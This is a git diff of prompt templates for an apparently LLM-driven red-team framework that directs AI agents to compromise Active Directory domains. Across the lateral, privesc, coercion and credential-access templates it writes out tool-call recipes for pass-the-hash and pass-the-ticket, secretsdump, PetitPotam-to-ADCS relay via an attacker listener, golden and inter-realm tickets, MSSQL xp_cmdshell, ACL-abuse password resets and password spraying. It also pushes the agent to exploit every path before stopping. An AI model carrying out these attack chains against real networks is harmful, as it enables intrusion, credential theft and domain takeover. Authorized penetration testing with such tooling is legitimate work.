Supports pass-the-hash via the 'hash' parameter.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": {"type": "string", "description": "DC IP or hostname"}, + "domain": {"type": "string", "description": "Target domain"}, + "username": {"type": "string"}, + "password": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash (use instead of password)"}, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN when credential domain differs from target domain" + } + }, + "required": ["target", "domain"] + }), + }, ] } diff --git a/ares-llm/templates/redteam/agents/acl.md.tera b/ares-llm/templates/redteam/agents/acl.md.tera index 8fbe7438..a6dce7f2 100644 --- a/ares-llm/templates/redteam/agents/acl.md.tera +++ b/ares-llm/templates/redteam/agents/acl.md.tera @@ -41,7 +41,8 @@ When you have these permissions on a user/computer: 1. **Shadow Credentials** (BEST - one step to hash) ``` - pywhisker(target_samaccountname="targetuser", domain="contoso.local", username="user", password="pass", dc_ip="192.168.58.10") + pywhisker(target_samaccountname="targetuser", domain="contoso.local", username="user", dc_ip="192.168.58.10") + → Worker injects credential for `user@contoso.local` from operation state → Use generated PFX with certipy_auth (from PrivEsc) to get NTLM hash ``` diff --git a/ares-llm/templates/redteam/agents/coercion.md.tera b/ares-llm/templates/redteam/agents/coercion.md.tera index 887c6fbc..b08c2a31 100644 --- a/ares-llm/templates/redteam/agents/coercion.md.tera +++ b/ares-llm/templates/redteam/agents/coercion.md.tera @@ -111,12 +111,41 @@ dfscoerce( ## Relay Attack Coordination -### For ADCS ESC8 -You handle the full ESC8 attack chain: -1. Start `ntlmrelayx_to_adcs(ca_host="ca.contoso.local", attacker_ip="YOUR_IP")` -2. Run `petitpotam(target="dc.contoso.local", listener="YOUR_IP")` to coerce DC -3. DC authenticates to relay, relay requests certificate from CA -4. Certificate is saved, use `certipy_auth` (on privesc) to get NTLM hash +### For ADCS ESC8 — USE `relay_and_coerce` +**Preferred:** make ONE deterministic call — do not orchestrate ntlmrelayx + petitpotam manually. The composite tool starts the relay, runs **unauthenticated PetitPotam first** (works on unpatched DCs without any creds), then optionally falls back to **DFSCoerce (MS-DFSNM)**, then to coercer over MS-EFSR/MS-RPRN if creds are supplied. It emits a `certificate_obtained` vulnerability that triggers `certipy_auth` automatically. + +**CRITICAL — source ≠ target.** `coerce_target` MUST be a different host than `ca_host`. Windows NTLM same-machine loopback protection blocks relayed auth when the coerced machine is the relay target. Coerce a DC (or other reachable machine) and relay it to the CA. Coercing the CA back to itself is dead. + +**Default — unauth (try this FIRST, no creds needed):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", # ADCS web enrollment host + coerce_target="dc01.contoso.local", # DIFFERENT host to coerce (not ca_host!) 
+ attacker_ip="YOUR_IP", + template="DomainController" +) +``` + +**With creds (only add if unauth fails or DC is known patched):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", + coerce_target="dc01.contoso.local", # MUST differ from ca_host + attacker_ip="YOUR_IP", + coerce_user="user", # Account to RPC the target machine + coerce_domain="user.realm", # User's home realm + template="DomainController" +) +``` +-> Worker injects `coerce_password` or `coerce_hash` for `(coerce_user, coerce_domain)` from state — never pass them yourself. + +Cross-forest case: `coerce_user` lives in the child realm; `coerce_target` is the parent DC (or another parent-realm machine). The captured cert is for that machine's account — `certipy_auth` will PKINIT into the parent realm and extract the hash. **Try unauth first — most lab DCs are unpatched against PetitPotam.** + +**Fallback (only if `relay_and_coerce` is unavailable):** +1. `ntlmrelayx_to_adcs(ca_host=..., attacker_ip=...)` +2. `petitpotam(target=..., listener=...)` or `dfscoerce(...)` +3. Wait for cert capture +4. Manually report cert path so privesc can run `certipy_auth` ### For LDAP Relay ``` @@ -192,7 +221,8 @@ Combine mitm6 with ntlmrelayx to create computer account: |------|----------| | ntlmrelayx_to_smb | Relay to SMB for psexec/secretsdump | | ntlmrelayx_to_ldaps | Relay to LDAPS (RBCD, delegate-access) | -| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) | +| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) — prefer `relay_and_coerce` | +| relay_and_coerce | **Composite ESC8: starts relay + coerces DC + emits cert vuln in one call** | | ntlmrelayx_multirelay | Multi-target relay with targets file | ## Hash Types Captured diff --git a/ares-llm/templates/redteam/agents/lateral.md.tera b/ares-llm/templates/redteam/agents/lateral.md.tera index 8793586c..374b7d47 100644 --- a/ares-llm/templates/redteam/agents/lateral.md.tera +++ b/ares-llm/templates/redteam/agents/lateral.md.tera @@ -42,45 +42,49 @@ Your role is to move through the network and extract credentials from compromise ### Method Priority Order +> **Credentials.** Call shapes below are principal-only. The worker resolves +> the password, hash, AES key, or ticket for `(username, domain)` from +> operation state at dispatch — never include `password`, `hash`, +> `ticket_path`, `aes_key`, or other secret fields yourself. + 1. **psexec** - Most reliable for admins - If psexec fails with "access denied", you don't have admin rights on the target - - Prefer pass-the-hash when available + - Worker auto-selects PTH vs password auth based on what's in state ``` - psexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - psexec(target="192.168.58.10", username="admin", password="P@ssw0rd!", domain="contoso.local") + psexec(target="192.168.58.10", username="admin", domain="contoso.local") ``` 2. **evil-winrm** - Works if WinRM enabled (check 5985/5986 first) ``` - evil_winrm(target="192.168.58.10", username="admin", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - evil_winrm(target="192.168.58.10", username="admin", password="P@ssw0rd!", domain="contoso.local") + evil_winrm(target="192.168.58.10", username="admin", domain="contoso.local") ``` 3. 
**wmi/smbexec** - Alternate methods ``` - wmiexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - smbexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") + wmiexec(target="192.168.58.10", username="admin", domain="contoso.local") + smbexec(target="192.168.58.10", username="admin", domain="contoso.local") ``` ### Pass-the-Hash -When you have NTLM hash instead of password, use the format `LM:NT` or just `NT`: +When the worker has only an NTLM hash for the principal, it auto-selects PTH — +no schema change on your side: ``` -psexec(target="dc01.contoso.local", username="administrator", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -evil_winrm(target="dc01.contoso.local", username="administrator", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -wmiexec(target="dc01.contoso.local", username="administrator", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") +psexec(target="dc01.contoso.local", username="administrator", domain="contoso.local") +evil_winrm(target="dc01.contoso.local", username="administrator", domain="contoso.local") +wmiexec(target="dc01.contoso.local", username="administrator", domain="contoso.local") ``` ### Pass-the-Ticket -When you have a Kerberos ticket (ccache file), use the `_kerberos` variants: +When you have a Kerberos ticket (ccache file), use the `_kerberos` variants — +the worker resolves the most recent ccache for the principal from disk: ``` -# If you already have a .ccache file from S4U/delegation/ADCS attack: -psexec_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") -wmiexec_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") -secretsdump_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") +psexec_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") +wmiexec_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") +secretsdump_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") # If you need to request a TGT first: -get_tgt(username="admin", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -# → Creates /tmp/admin.ccache, then use it with the _kerberos tools +get_tgt(username="admin", domain="contoso.local") +# → Creates a ccache for admin@contoso.local; subsequent _kerberos tools pick it up. 
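+
+# e.g. a hypothetical follow-on for the same principal (the worker picks up
+# the fresh ccache automatically):
+psexec_kerberos(target="dc01.contoso.local", username="admin", domain="contoso.local")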
``` Use Kerberos when: @@ -94,14 +98,11 @@ Use Kerberos when: ### Secretsdump (Primary Method) After gaining access to a host, **immediately run secretsdump**: ``` -# With password: -secretsdump(target="192.168.58.10", domain="contoso.local", username="admin", password="P@ssw0rd!") - -# With hash (pass-the-hash): -secretsdump(target="192.168.58.10", domain="contoso.local", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0") +# Worker auto-selects password / hash / ticket based on what's in state for (username, domain): +secretsdump(target="192.168.58.10", domain="contoso.local", username="admin") -# With Kerberos ticket: -secretsdump_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") +# Force Kerberos ticket auth (worker picks the most recent ccache for the principal): +secretsdump_kerberos(target="dc01.contoso.local", domain="contoso.local", username="administrator") ``` Extracts: diff --git a/ares-llm/templates/redteam/agents/orchestrator.md.tera b/ares-llm/templates/redteam/agents/orchestrator.md.tera index 37824ce3..063cf085 100644 --- a/ares-llm/templates/redteam/agents/orchestrator.md.tera +++ b/ares-llm/templates/redteam/agents/orchestrator.md.tera @@ -66,12 +66,13 @@ Your role is to **delegate tasks to specialized worker agents** and coordinate t - `dispatch_recon(target_ip="", domain="contoso.local", techniques=["bloodhound_collect"])` 2. **Dispatch Low-Hanging Fruit** (to CREDENTIAL_ACCESS worker) - - `dispatch_credential_access(technique="password_spray", target_ip="DC_IP", domain="contoso.local", username="", password="")` - - `dispatch_credential_access(technique="asrep_roast", target_ip="DC_IP", domain="contoso.local", username="", password="")` + - `dispatch_credential_access(technique="password_spray", target_ip="DC_IP", domain="contoso.local")` + - `dispatch_credential_access(technique="asrep_roast", target_ip="DC_IP", domain="contoso.local")` 3. **Dispatch Credential Expansion** (IMMEDIATELY when creds found) - - `dispatch_credential_access(technique="secretsdump", target_ip="DC_IP", domain="contoso.local", username="user", password="pass")` - - `dispatch_credential_access(technique="kerberoast", target_ip="DC_IP", domain="contoso.local", username="user", password="pass")` + - `dispatch_credential_access(technique="secretsdump", target_ip="DC_IP", domain="contoso.local", username="user")` + - `dispatch_credential_access(technique="kerberoast", target_ip="DC_IP", domain="contoso.local", username="user")` + - The dispatched worker resolves the credential for `username@domain` from operation state. 4. **Dispatch ADCS Enumeration** (when credentials available) - `dispatch_privesc_exploit(vuln_id="adcs_enum")` - Runs certipy_find diff --git a/ares-llm/templates/redteam/agents/privesc.md.tera b/ares-llm/templates/redteam/agents/privesc.md.tera index 37af0e0e..09313963 100644 --- a/ares-llm/templates/redteam/agents/privesc.md.tera +++ b/ares-llm/templates/redteam/agents/privesc.md.tera @@ -96,12 +96,17 @@ If you find yourself calling documentation tools more than attack tools, STOP an ### ESC1 - Enrollee Supplies Subject When ESC1 vulnerability is found: ``` -1. certipy_request(domain="contoso.local", username="user", password="pass", ca="CA-NAME", +1. certipy_request(domain="contoso.local", username="user", ca="CA-NAME", template="VulnTemplate", upn="administrator@contoso.local", dc_ip="DC_IP") 2. 
certipy_auth(domain="contoso.local", pfx_file="output.pfx", dc_ip="DC_IP") → Get Administrator NTLM hash ``` +> **Credentials.** All examples below show principal-only call shapes +> (`username`, `domain`). The worker resolves passwords/hashes/tickets/SIDs from +> operation state at dispatch — never include `password`, `hash`, `ticket_path`, +> `krbtgt_hash`, `domain_sid`, `trust_key`, or other secret fields yourself. + If RPC fails (ept_s_not_registered), coordinate with COERCION agent for ESC8 relay instead. ### ESC4 - Template Modification (Full Chain) @@ -110,7 +115,6 @@ When ESC4 vulnerability is found, use the full chain tool: certipy_esc4_full_chain( domain="contoso.local", username="user", - password="pass", template="VulnTemplate", ca="CA-NAME", target_user="administrator", @@ -150,7 +154,6 @@ For any user/computer you have GenericAll on: certipy_shadow( domain="contoso.local", username="youruser", - password="pass", target="targetuser", dc_ip="DC_IP" ) @@ -169,10 +172,10 @@ s4u_attack( impersonate="Administrator", domain="contoso.local", username="svc_account", - password="service_password", dc_ip="192.168.58.10" ) ``` +→ Worker injects the credential for `svc_account@contoso.local` from state. → Look for: "Saving ticket in Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache" **STEP 2: IMMEDIATELY use ticket with secretsdump_kerberos** @@ -181,10 +184,10 @@ secretsdump_kerberos( target="dc01.contoso.local", username="Administrator", domain="contoso.local", - ticket_path="Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache", dc_ip="192.168.58.10" ) ``` +→ Worker resolves the most recent ccache for `Administrator@contoso.local` from disk. → If target is DC: krbtgt hash = DOMAIN ADMIN → If target is DC: Administrator hash = DOMAIN ADMIN @@ -194,7 +197,6 @@ psexec_kerberos( target="dc01.contoso.local", username="Administrator", domain="contoso.local", - ticket_path="Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache", command="cmd /c whoami && hostname" ) ``` @@ -227,7 +229,6 @@ MSSQL is often a path to domain compromise through impersonation and linked serv mssql_enum_impersonation( target="sql.contoso.local", username="any_domain_user", - password="found_password", domain="CONTOSO.LOCAL" ) ``` @@ -245,7 +246,6 @@ b'LOGIN' b'' IMPERSONATE GRANT CONTOSO\your_user sa mssql_impersonate( target="sql.contoso.local", username="any_domain_user", - password="password", impersonate_user="sa", query="SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')", domain="CONTOSO.LOCAL" @@ -260,7 +260,6 @@ mssql_impersonate( mssql_enable_xp_cmdshell( target="sql.contoso.local", username="any_domain_user", - password="password", domain="CONTOSO.LOCAL" ) ``` @@ -272,7 +271,6 @@ mssql_enable_xp_cmdshell( mssql_command( target="sql.contoso.local", username="any_domain_user", - password="password", command="whoami /priv", domain="CONTOSO.LOCAL" ) @@ -288,7 +286,6 @@ mssql_command( mssql_enum_linked_servers( target="sql.contoso.local", username="sql_svc", - password="found_password", domain="CONTOSO.LOCAL" ) ``` @@ -301,7 +298,6 @@ mssql_exec_linked( linked_server="remote-sql.fabrikam.local", query="SELECT SYSTEM_USER", username="sql_user", - password="password", domain="CONTOSO.LOCAL" ) ``` @@ -313,7 +309,6 @@ Force SQL server to authenticate to your listener: mssql_ntlm_coerce( target="sql.contoso.local", username="sql_user", - password="password", listener_ip="YOUR_IP", domain="CONTOSO.LOCAL" ) @@ -328,7 +323,6 @@ When a child domain krbtgt hash is available: raise_child( 
child_domain="child.contoso.local", username="user", - password="pass", target_domain="contoso.local" ) → Enterprise Admin, then secretsdump parent DCs @@ -340,13 +334,12 @@ If raise_child fails, manually forge ticket with Enterprise Admin SID: 1. Get child domain SID: get_sid(domain="child.contoso.local", dc_ip="CHILD_DC_IP") 2. Get parent domain SID: get_sid(domain="contoso.local", dc_ip="PARENT_DC_IP") 3. generate_golden_ticket( - krbtgt_hash="aad3b435...", domain="child.contoso.local", - domain_sid="S-1-5-21-child...", user="Administrator", user_id=500, - extra_sids="S-1-5-21-parent...-519" # Enterprise Admins + extra_sid_rid=519 # Enterprise Admins ) + → Worker injects krbtgt_hash, domain_sid, and parent SID from state → Ticket valid in parent domain 4. Use ticket with psexec_kerberos/secretsdump_kerberos on parent DCs ``` @@ -361,18 +354,17 @@ When DA is achieved in one forest and a cross-forest trust exists: domain="contoso.local", dc_ip="DC_IP", target_domain="fabrikam.local", - username="Administrator", - password="pass" + username="Administrator" ) + → Worker injects the source DA credential from state → Gets FABRIKAM$ trust account NTLM hash 2. create_inter_realm_ticket( source_domain="contoso.local", - source_sid="S-1-5-21-source...", - trust_key="aad3b435...:ntlm_hash", target_domain="fabrikam.local", - target_sid="S-1-5-21-target..." + username="Administrator" ) + → Worker injects source_sid, target_sid, and trust_key from state → Forges inter-realm TGT 3. Use ticket for secretsdump against fabrikam.local DCs @@ -400,7 +392,7 @@ SweetPotato.exe -c "cmd /c whoami" ### RBCD Self-Relay For local privilege escalation via RBCD (requires ability to add computer): ``` -1. add_computer(domain="contoso.local", username="user", password="pass", dc_ip="DC_IP") +1. add_computer(domain="contoso.local", username="user", dc_ip="DC_IP") → Creates controlled machine account 2. rbcd_write(target_computer="YOURPC", delegate_from="YOURCONTROLLED$", ...) → Configure RBCD delegation diff --git a/ares-llm/templates/redteam/agents/system_instructions.md.tera b/ares-llm/templates/redteam/agents/system_instructions.md.tera index 7d339e6d..eb65e6e7 100644 --- a/ares-llm/templates/redteam/agents/system_instructions.md.tera +++ b/ares-llm/templates/redteam/agents/system_instructions.md.tera @@ -26,6 +26,44 @@ You are in an Active Directory environment with access to: - **EXPANDED ADCS**: ESC1-15 including certipy_template_esc4, ntlmrelayx_to_adcs, certipy_shadow - **EXPANDED DELEGATION**: s4u_attack, get_tgt +{% if listener_ip -%} +## 🛰️ OPERATOR INFRASTRUCTURE — YOUR LISTENER IP + +**Your listener / attacker IP is `{{ listener_ip }}`.** + +Use this exact value for every `listener_ip`, `attacker_ip`, or relay-listener +parameter you pass to a tool (PetitPotam, Coercer, dfscoerce, ntlmrelayx, +SearchConnector, MSSQL coerce, etc.). Do NOT guess subnet gateways +(`10.x.x.1`), do NOT use the target's own subnet base, and do NOT invent a +placeholder. If the tool schema requires a listener and you pick anything +other than `{{ listener_ip }}`, the coercion will time out unreachable. 
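+
+A minimal sketch, assuming the coercion/relay tools named elsewhere in these
+prompts (target hostnames are placeholders):
+
+```
+petitpotam(target="dc01.contoso.local", listener="{{ listener_ip }}")
+ntlmrelayx_to_adcs(ca_host="ca.contoso.local", attacker_ip="{{ listener_ip }}")
+```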
+ +{% endif -%} +## 🔒 CRITICAL: CREDENTIAL HANDLING (READ THIS FIRST) + +**The dispatcher injects credentials at runtime — you do NOT pass them.** Tool +schemas EXCLUDE all secret fields (`password`, `nthash`, `aes256_key`, +`ticket_path`, `hashes`, `aesKey`, `pfx_password`, `coerce_password`, +`coerce_hash`, `trust_key`, `krbtgt_hash`, `domain_sid`, `target_sid`, +`source_sid`, `extra_sid`, `lm_hash`, `nt_hash`, `kerberos_keys`, `dpapi_key`). +Attempting to include them is a schema violation. + +**Reference principals by name only.** When you call a tool, supply the +non-secret coordinates: `target`, `username`, `domain`, `dc_ip`, `target_ip`, +`technique`, etc. The worker looks up the credential from operation state +based on `username` + `domain` and injects it before the tool runs. + +**If you don't see a credential field on a tool, that's intentional — do not +try to add it back, do not synthesize a placeholder like ``, +`[TGT]`, `password='N/A'`, or ``. There is no +way to override the auto-resolved credential, and any placeholder you invent +will be rejected as a hallucination.** + +If a tool fails because no credential is available for the named principal, +that means operation state is empty for that principal — source credentials +first (DCSync, kerberoast, password spray, ADCS escalation, etc.) and then +retry with the same principal name. + ## ⛔ CRITICAL: DO NOT SUMMARIZE UNTIL ALL PATHS EXPLOITED **Discovery without exploitation is FAILURE.** diff --git a/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera b/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera new file mode 100644 index 00000000..d6f6db4e --- /dev/null +++ b/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera @@ -0,0 +1,89 @@ +## ACL Abuse Step: {{ task_id }} + +You are exploiting a discovered ACL edge against an Active Directory object. +The orchestrator has already resolved a credential that owns the right. + +**Credential injection contract (READ CAREFULLY):** + +- You MUST pass `username` and `domain` to every tool — those identify the + principal we authenticate as. Use the values shown in **Source principal** + below. Never pass a SID as `username`; always use the SAM account name. +- You MUST NOT pass `password`, `hash`, `nt_hash`, `aes_key`, `ticket_path`, + or any other secret material. The orchestrator injects those automatically + from state by `(username, domain)` immediately before tool dispatch. +- If you pass `password=...`, it will be stripped. If you omit `username` + or `domain`, secret injection cannot run and the tool will fail with + invalidCredentials. So: name the principal, leave the secret to us. + +{% if acl_type -%} +**ACL right:** `{{ acl_type }}` +{% endif -%} +{% if source_user -%} +**Source principal (we authenticate as this):** `{{ source_user }}`{% if source_domain %}@{{ source_domain }}{% endif %} +{% endif -%} +{% if target_user -%} +**Target object (we abuse the ACL against this):** `{{ target_user }}` +{% endif -%} +{% if domain -%} +**Domain:** `{{ domain }}` +{% endif -%} +{% if dc_ip -%} +**Domain controller IP (`dc_ip` argument):** `{{ dc_ip }}` +{% endif -%} +{% if vuln_id -%} +**Vuln ID (echo back when reporting):** `{{ vuln_id }}` +{% endif %} + +{% if step_json -%} +**Raw chain step (for context — may contain edge type / DN hints):** +```json +{{ step_json }} +``` +{% endif -%} + +### How to choose a tool + +Map the ACL right to the right exploit tool. All tools require `dc_ip` — use +the value above. 
Pass `target` as the SAM account name of the target object +(not its DN — the tools resolve DN themselves via LDAP). + +| ACL right | Tool to call | Effect | +|----------------------------------|-----------------------------------|-------------------------------------------------------| +| `forcechangepassword` | `bloodyad_set_password` | Reset target user's password to one we choose | +| `genericall` on a USER | `bloodyad_set_password` *or* `pywhisker` (shadow creds) | Take over user account | +| `genericall` on a GROUP | `bloodyad_add_group_member` | Add source principal (or chosen user) to the group | +| `genericwrite` on USER (no SPN) | `pywhisker` / `targeted_kerberoast` | Add msDS-KeyCredentialLink or set SPN + roast | +| `writeproperty` on USER | `pywhisker` *or* `targeted_kerberoast` | Write msDS-KeyCredentialLink or servicePrincipalName | +| `writeproperty` on GROUP (member attr) | `bloodyad_add_group_member` | Add source principal to the group | +| `allextendedrights` on USER | `bloodyad_set_password` *or* `pywhisker` | Equivalent to ForceChangePassword + DS-Replication | +| `addmember` / `addself` on GROUP | `bloodyad_add_group_member` | Add source principal to the group | +| `writedacl` | `dacl_edit` | Grant ourselves an actionable right, then chain | +| `writeowner` | `dacl_edit` (with `rights=WriteDacl`) | Note: ownership change needed first; if dacl_edit alone fails, report insufficient_context | +| `self_membership` / `write_membership` on a GROUP | `bloodyad_add_group_member` | Add source principal to the group | + +**Group targets:** when `target_user` resolves to a group (e.g. `Domain Admins`, +`DnsAdmins`, `Group Policy Creator Owners`, `Users`), use `bloodyad_add_group_member` +and add the source principal (`{{ source_user }}{% if source_domain %}@{{ source_domain }}{% endif %}`) +or another principal you control. Do NOT call `bloodyad_set_password` on a group. + +**Validate after exploit:** if you reset a password, immediately call +`smb_login_check` against `{{ dc_ip }}` to confirm the new credential works. +If you added group membership, the new privilege is live on the next Kerberos +auth — call `domain_admin_checker` to confirm DA reach (when relevant). + +### Reporting + +Call `report_finding` with the new credential or membership change so the +orchestrator can chain follow-on tasks. Then call `task_complete` summarising +the result (success/failure + observed evidence). Echo `vuln_id` if present. + +If the payload truly lacks the data you need (no `target_user`, no `dc_ip`), +call `task_complete` with status=`insufficient_context` and explain what was +missing — do NOT call `request_assistance`; the orchestrator can re-derive +context only from a structured failure report. 
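+
+### Worked example (hypothetical values)
+
+A minimal sketch for a `forcechangepassword` edge, assuming the call shapes
+follow the contract above (principal-only: the orchestrator injects the
+secret, and `target` is the SAM account name):
+
+```
+bloodyad_set_password(target="targetuser", username="{{ source_user }}", domain="{{ domain }}", dc_ip="{{ dc_ip }}")
+smb_login_check(target="{{ dc_ip }}", username="targetuser", domain="{{ domain }}")  # confirm the reset took
+report_finding(...)  # report the new credential for targetuser
+task_complete(...)   # status + evidence; echo vuln_id if present
+```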
+ +{% if state_context %} +## Current Operation State + +{{ state_context }} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera b/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera index 908fa2e7..d61a21ff 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera @@ -3,7 +3,7 @@ Domain: {{ domain }} Targets: {{ targets_display }} DC IP: {{ dc_ip_display }} Username: {{ user_display }} -Credential ({{ cred_type }}): {{ cred_value }} +Auth: {{ cred_type }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) {% if hash_type -%} Hash Type: {{ hash_type }} {% endif -%} @@ -20,7 +20,7 @@ Task ID: {{ task_id }} {{ hash_note }} {% endif -%} -Use the exact credential value above; do not substitute placeholders. If DC IP is provided, pass -dc-ip to Kerberos/LDAP tools to avoid DNS issues. **PRIORITY ORDER when creds available:** +Reference the principal by username + domain only; the worker injects the credential at dispatch. If DC IP is provided, pass -dc-ip to Kerberos/LDAP tools to avoid DNS issues. **PRIORITY ORDER when creds available:** 1. gpp_password_finder + sysvol_script_search (LOW HANGING FRUIT - run first!) 2. Kerberoast for service account hashes 3. secretsdump if admin access exists diff --git a/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera b/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera index e484e195..86c08477 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera @@ -14,13 +14,12 @@ This ticket allows you to impersonate Administrator to the target. secretsdump( target='{{ target }}', username='{{ user }}', - no_pass=True, - ticket_path='{{ ticket }}'{% if dc_ip %}, + no_pass=True{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) **IMPORTANT:** -- The ticket_path sets KRB5CCNAME for Kerberos auth +- Worker injects the ccache for `{{ user }}` automatically — do NOT pass `ticket_path` - no_pass=True tells secretsdump to use -k -no-pass - This will dump SAM, LSA secrets, and domain hashes if on a DC diff --git a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera index 5535e0fb..9a593f2b 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera @@ -4,34 +4,43 @@ DC IP: {{ dc_ip_display }} Task ID: {{ task_id }} **CRITICAL: These techniques work WITHOUT credentials to discover passwords:** -1. username_as_password(target=DC_IP, domain=DOMAIN) - HIGH SUCCESS RATE +1. username_as_password(target=DC_IP, domain=DOMAIN{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) - HIGH SUCCESS RATE Tests if users have username=password (e.g., testuser:testuser) - Zero lockout risk, one attempt per user + Zero lockout risk, one attempt per user{% if excluded_users %} + **DO NOT include these locked-out users: {{ excluded_users }} — pass them via `excluded_users` so the worker drops them from the wordlist.**{% endif %} 2. password_policy(target=DC_IP, domain=DOMAIN) - REQUIRED BEFORE SPRAY Read the lockout threshold (e.g. "Account Lockout Threshold: 5"). You must pass it as `lockout_threshold` to every password_spray call below. If the policy says 0 / "Never", lockout is disabled — pass 0. 
+ **NOTE: `password_policy` requires authenticated bind. With NO credentials, + skip directly to step 3 with `acknowledge_no_policy=true`.** -3. password_spray - one call per password. The tool keeps a 1-attempt safety - buffer below `lockout_threshold` and refuses to run when the budget is gone. - **Increment `attempts_used_per_account` by 1 after each spray** so successive - sprays stop before locking accounts: +3. password_spray - one call per candidate password. Pass `password='X'` to + spray a single value, or `use_common_passwords=true` for the built-in list. + The tool keeps a 1-attempt safety buffer below `lockout_threshold` and + refuses to run when the budget is gone. + **Increment `attempts_used_per_account` by 1 after each spray** so + successive sprays stop before locking accounts.{% if excluded_users %} + **Always pass `excluded_users='{{ excluded_users }}'` to skip already-locked accounts.**{% endif %} password_spray(target=DC_IP, domain=DOMAIN, password='Password1', - lockout_threshold=THRESHOLD, attempts_used_per_account=0) + lockout_threshold=THRESHOLD, attempts_used_per_account=0{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Welcome1', - lockout_threshold=THRESHOLD, attempts_used_per_account=1) + lockout_threshold=THRESHOLD, attempts_used_per_account=1{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Passw0rd!', - lockout_threshold=THRESHOLD, attempts_used_per_account=2) + lockout_threshold=THRESHOLD, attempts_used_per_account=2{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Winter2025', - lockout_threshold=THRESHOLD, attempts_used_per_account=3) + lockout_threshold=THRESHOLD, attempts_used_per_account=3{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Spring2026', - lockout_threshold=THRESHOLD, attempts_used_per_account=4) + lockout_threshold=THRESHOLD, attempts_used_per_account=4{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) + + **No-creds fallback** (when `password_policy` failed): + password_spray(target=DC_IP, domain=DOMAIN, password='Password1', + acknowledge_no_policy=true{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) If a spray returns a "lockout budget exhausted" refusal, STOP — do not retry - until the AD observation window resets. Only set `acknowledge_no_policy=true` - if password_policy itself failed and the engagement allows lockouts. + until the AD observation window resets. These are the FIRST techniques to run when you have no credentials. Report any credentials found immediately. diff --git a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera index 65df4d39..d51e3020 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera @@ -2,14 +2,14 @@ Perform LOW HANGING FRUIT credential harvesting: Domain: {{ domain }} DC IP: {{ dc_ip_display }} Username: {{ user_display }} -Password: {{ password }} +Auth: password (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} -**EXECUTE IN THIS ORDER:** -1. 
